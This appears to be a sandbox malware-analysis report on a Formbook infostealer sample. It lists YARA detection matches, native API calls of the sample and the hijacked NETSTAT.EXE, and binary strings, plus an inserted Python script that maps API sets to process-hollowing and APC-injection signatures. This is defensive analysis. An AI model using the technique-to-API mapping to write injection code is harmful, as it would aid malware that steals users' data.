Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00419830 NtCreateFile,
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_004198E0 NtReadFile,
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00419960 NtClose,
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00419A10 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_0041982A NtCreateFile,
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_004198DA NtReadFile,
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_0041995B NtClose,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A350 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A360 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A310 NtEnumerateValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A3D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A3E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A240 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A260 NtWriteFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A2D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A800 NtSetValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A750 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A610 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A6A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A540 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A560 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A470 NtSetInformationFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A410 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343ACE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A480 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A370 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A220 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343BA30 NtSetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A2F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343B0B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A700 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A710 NtQuerySection,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A720 NtResumeThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A780 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A650 NtQueueApcThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A6D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343BD40 NtSuspendThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A520 NtEnumerateKey,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A5F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A5A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A460 NtOpenProcess,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343B470 NtOpenThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343B410 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A430 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A4A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E79A10 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E798E0 NtReadFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E79830 NtCreateFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E79960 NtClose,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E798DA NtReadFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E7982A NtCreateFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E7995B NtClose,
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_00419830 NtCreateFile,
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_004198E0 NtReadFile,
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_00419960 NtClose,
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_00419A10 NtAllocateVirtualMemory,
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_0041982A NtCreateFile,
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_004198DA NtReadFile,
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_0041995B NtClose,
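The native API functions resolved inside NETSTAT.EXE (process 6) are the raw material behind several signatures at the top of this report: NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread together are process hollowing; NtOpenProcess, NtOpenThread and NtQueueApcThread are APC injection; NtCreateSection and NtMapViewOfSection are section mapping into another process. The original Scan_06032020.exe instance (process 4) and the dropped copy (process 17) only expose file and allocation calls. The following Python is an added example, not part of the sandbox report, that reads the rows above and reports which signature each process's Nt* set accounts for and what is missing for the others. The technique-to-API sets are the analyst's own summaries of the standard primitives, not text from the report, and the presence of a resolved stub is evidence consistent with a signature rather than proof that the call was made; the behavioural signatures above came from observed calls.

```python
"""Map the native API functions listed above onto the injection signatures of this report.

Added example, not part of the sandbox report. Constructed input: a subset of the
'Code function' rows above, in the 'Source: <process> | Code function: ...' layout.
The technique-to-API sets are the analyst's own summaries of the textbook
primitives, not something the report states.
"""
import re

ROWS = r"""
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00419830 NtCreateFile,
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_004198E0 NtReadFile,
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00419960 NtClose,
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00419A10 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A360 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A6A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A480 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343BA30 NtSetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343B0B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A700 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A720 NtResumeThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A650 NtQueueApcThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A6D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343BD40 NtSuspendThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A5A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A460 NtOpenProcess,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343B470 NtOpenThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0343A4A0 NtUnmapViewOfSection,
"""

ROW_RE = re.compile(r"Code function: (?P<pid>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-F]+) (?P<calls>\S+)$")

# Report signature -> the Nt* primitives that together implement it (analyst's summary).
TECHNIQUES = {
    "Sample uses process hollowing technique":
        {"NtUnmapViewOfSection", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
         "NtSetContextThread", "NtResumeThread"},
    "Queues an APC in another process (thread injection)":
        {"NtOpenProcess", "NtOpenThread", "NtQueueApcThread"},
    "Maps a DLL or memory area into another process":
        {"NtCreateSection", "NtMapViewOfSection"},
    "Modifies the context of a thread in another process (thread injection)":
        {"NtSuspendThread", "NtGetContextThread", "NtSetContextThread", "NtResumeThread"},
}


def native_calls_by_pid(text):
    """{pid: {Nt* names}} from the rows; non-Nt callees such as LdrInitializeThunk are dropped."""
    calls = {}
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if not m:
            continue
        names = {c for c in m.group("calls").split(",") if c.startswith("Nt")}
        calls.setdefault(int(m.group("pid")), set()).update(names)
    return calls


def matched_signatures(api_set):
    """(signatures fully covered by api_set, {signature: sorted missing primitives})."""
    hit, missing = [], {}
    for sig, need in TECHNIQUES.items():
        gap = need - api_set
        if gap:
            missing[sig] = sorted(gap)
        else:
            hit.append(sig)
    return hit, missing


if __name__ == "__main__":
    for pid, apis in sorted(native_calls_by_pid(ROWS).items()):
        hit, missing = matched_signatures(apis)
        print(f"pid {pid}: {len(apis)} native calls")
        for sig in hit:
            print(f"  covers:  {sig}")
        for sig, gap in missing.items():
            print(f"  missing: {sig}: {', '.join(gap)}")
```

With the rows above, process 6 covers all four signatures and process 4 none, which matches the report's attribution of the injection behaviour to the hijacked NETSTAT.EXE.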
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01012208
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01010472
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01010FC0
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01013110
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01011839
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01014B80
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01014B90
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01010F2C
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01012FCE
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010151D8
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010151E8
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010130A9
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010130BC
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010153F8
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01015408
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0101F7F0
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010156A0
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_010156B0
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01013F79
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_01013F88
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_09DDF798
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_09DDF78A
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C4151
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C30D8
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C2650
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C4490
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C4207
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C310D
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C1030
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C1020
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 0_2_0B1C30C9
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00401030
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_0041D9C8
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00402D89
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00402D90
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_0041DEEC
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00409F5B
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00409F60
Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4_2_00402FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0341FB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034263C2
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03424B96
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_033FEBE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03424A5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B0A02
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034CE214
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0342523D
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C22DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C1A99
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034142B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0342594B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03449906
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03427110
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B61DF
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C19E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03426180
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034CD9BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03421070
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03429810
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034BD016
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0342E020
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03420021
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034248CB
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C28E8
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0340A080
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034A18B6
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C1746
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C1FCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B2782
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03415790
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03417640
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03424E61
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034BCE66
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03425E70
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03426611
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C26F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B3E96
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B1D1B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C2519
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03411530
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0349C53F
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_033F0D40
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034AFDDB
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034BD5D2
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034A1DE3
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0349E58A
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034BE581
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0342547E
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0340740C
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03411410
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034AF42B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034BDCC5
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B44EF
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C1C9F
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C2C9A
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B3490
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E7D9C8
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E7DEEC
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E62FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E69F60
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E69F5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E62D89
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_02E62D90
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 16_2_0A05F798
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 16_2_0A05F797
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 16_2_0B444151
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 16_2_0B4430D8
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 16_2_0B442650
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 16_2_0B444490
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 16_2_0B444207
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 16_2_0B44310D
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 16_2_0B441020
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 16_2_0B441030
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 16_2_0B4430C9
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_00401030
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 17_2_0041D9C8
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00402D89
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00402D90
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041DEEC
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00409F5B
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00409F60
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00402FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03485110 appears 38 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0344DDE8 appears 43 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 033FB0E0 appears 176 times
          Source: Scan_06032020.exe Binary or memory string: OriginalFilename vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000002.555559475.00000000006C2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000002.565029549.000000000B130000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000000.528970707.0000000000652000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000000.00000002.556283565.0000000000DD0000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000002.00000002.551467733.00000000003E2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000002.00000002.551670785.0000000000452000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000003.00000000.552652444.00000000001B2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000003.00000000.552510795.0000000000142000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000002.606369972.0000000001C9F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000000.554340459.0000000000EA2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000002.603915424.0000000000FF0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Scan_06032020.exe
          Source: Scan_06032020.exe, 00000004.00000000.554197147.0000000000E32000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exe Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
          Source: Scan_06032020.exe Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
          Source: C:\Windows\explorer.exe Section loaded: comsvcs.dll
          Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
